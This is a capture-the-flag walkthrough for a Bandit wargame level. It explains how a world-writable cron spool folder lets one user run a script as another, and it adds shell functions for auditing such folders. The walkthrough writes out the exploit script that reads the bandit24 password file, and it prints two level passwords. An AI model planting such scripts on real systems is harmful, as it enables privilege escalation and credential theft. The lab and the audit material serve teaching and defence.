Introduction
Welcome back. In this level we will learn some basics of privilege escalation by abusing cron jobs.
Previous flag
QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G
Checking Cron files
Let's start by checking the cron jobs for the user bandit24:
cat /etc/cron.d/cronjob_bandit24
The entries within this file reveal the location of a script in the /usr/bin folder.
Reading Cron Script
Let’s open the .sh script file and check its contents:
cat /usr/bin/cronjob_bandit24.sh
The contents of this file show that the cron job (running as bandit24) iterates over the files in the /var/spool/bandit24/foo folder, executes every file owned by our user, bandit23, with a 60-second timeout, and then deletes it:

#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    # skip the . and .. entries matched by the .* glob
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        # only ownership is checked; nothing verifies who can write to the folder
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done
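As an added illustration, not part of the Bandit level or of the cron script above, the shell functions below encode the two checks that cronjob_bandit24.sh omits and whose absence lets any local user drop an executable into the spool folder: the directory a cron job iterates over must belong to the expected user and must not be writable by group or others, and each candidate file must be a regular file (not a symlink), owned by the expected user and not writable by anyone else. The function names, the numeric-uid comparison and the temporary directory created in the usage section are my own choices; like the original script, the functions depend on GNU stat.

```shell
#!/bin/sh
# Added audit helpers (not from the Bandit level). They model what a cron job
# that executes user-supplied files should verify before running anything.

# Print the last three octal digits of a path's mode, e.g. 1777 -> 777.
mode_bits() {
    m=$(stat --format '%a' "$1") || return 1
    printf '%s\n' "${m#"${m%???}"}"
}

# Succeed (0) only when neither the group nor the "other" class may write to $1.
not_writable_by_others() {
    bits=$(mode_bits "$1") || return 1
    g=${bits%?}; g=${g#?}          # middle digit: group permissions
    o=${bits#??}                   # last digit: permissions for others
    [ $(( g & 2 )) -eq 0 ] && [ $(( o & 2 )) -eq 0 ]
}

# A directory is safe to iterate only if it is owned by the expected uid and
# nobody else can create files in it (the Bandit spool is 1777, so this fails).
# Owners are compared numerically so the check does not depend on passwd lookups.
audit_exec_dir() {
    dir=$1; expected_uid=$2
    [ -d "$dir" ] || return 1
    [ "$(stat --format '%u' "$dir")" = "$expected_uid" ] || return 1
    not_writable_by_others "$dir"
}

# A file is safe to execute only if it is a regular, non-symlinked file owned by
# the expected uid and not writable by others (so it cannot be swapped between
# the ownership check and the exec).
safe_to_execute() {
    f=$1; expected_uid=$2
    [ ! -L "$f" ] || return 1
    [ -f "$f" ] || return 1
    [ "$(stat --format '%u' "$f")" = "$expected_uid" ] || return 1
    not_writable_by_others "$f"
}

# Usage: audit a constructed spool directory with the mode the Bandit level uses.
demo_dir=$(mktemp -d)
chmod 1777 "$demo_dir"
if audit_exec_dir "$demo_dir" "$(id -u)"; then
    echo "$demo_dir: safe to iterate"
else
    echo "$demo_dir: refusing, directory is writable by other users"
fi
rm -rf "$demo_dir"
```

A cron job written this way would refuse to run at all against a world-writable spool, which is exactly the condition the walkthrough relies on; auditing every script referenced from /etc/cron.d with audit_exec_dir is a quick way to find the same pattern on a host you administer.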
Let's write a bash command that copies the password of bandit24 to a temporary location:
cat /etc/bandit_pass/bandit24 > /tmp/bandit23/password.txt
Abusing the Cron Job
Create a directory and script to intercept the password:
mkdir /tmp/bandit23
nano /var/spool/bandit24/foo/script.sh
Within the newly created script, write the command we defined before:

#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/bandit23/password.txt
Grant execution permissions to the script:
chmod +x /var/spool/bandit24/foo/script.sh
Now the exploit is set. Once the cron job has run, we can read the password for the next level:
cat /tmp/bandit23/password.txt
Flag:
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar